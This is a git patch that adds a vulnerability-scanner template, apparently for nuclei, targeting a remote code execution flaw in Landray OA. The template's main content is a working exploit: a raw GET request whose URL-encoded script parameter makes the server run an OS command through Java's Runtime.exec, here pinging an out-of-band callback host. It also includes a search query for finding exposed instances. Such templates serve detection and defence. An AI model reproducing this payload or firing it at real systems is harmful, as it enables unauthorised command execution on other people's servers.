From 4b3d71997fa6c93293b6159ef8f0fbd615ad3cba Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 29 Aug 2023 11:19:46 +0530 Subject: [PATCH] landray-oa-datajson-rce --- .../other/landray-oa-datajson-rce.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/vulnerabilities/other/landray-oa-datajson-rce.yaml diff --git a/http/vulnerabilities/other/landray-oa-datajson-rce.yaml b/http/vulnerabilities/other/landray-oa-datajson-rce.yaml new file mode 100644 index 0000000000..e9d0b0eb7f --- /dev/null +++ b/http/vulnerabilities/other/landray-oa-datajson-rce.yaml @@ -0,0 +1,31 @@ +id: landray-oa-datajson-rce + +info: + name: Landray OA Datajson S Bean - Remote Code Execution + author: SleepingBag945 + severity: critical + description: Landray-OA s_bean sysFormulaSimulateByJS RCE + reference: + - https://github.com/k3sc/Landray-oa-rce-1/blob/main/poc.py + metadata: + max-request: 1 + verified: true + fofa-query: app="Landray-OA系统" + tags: landray,rce + + +http: + - raw: + - | + GET /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=%66%75%6e%63%74%69%6f%6e%20%74%65%73%74%28%29%7b%20%72%65%74%75%72%6e%20%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%7d%3b%72%3d%74%65%73%74%28%29%3b%72%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%2d%63%20%34%20{{interactsh-url}}%22%29&type=1 HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Connection:close + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(interactsh_protocol, "dns")' + - 'contains(body, "success") && contains(body, "true")' + condition: and \ No newline at end of file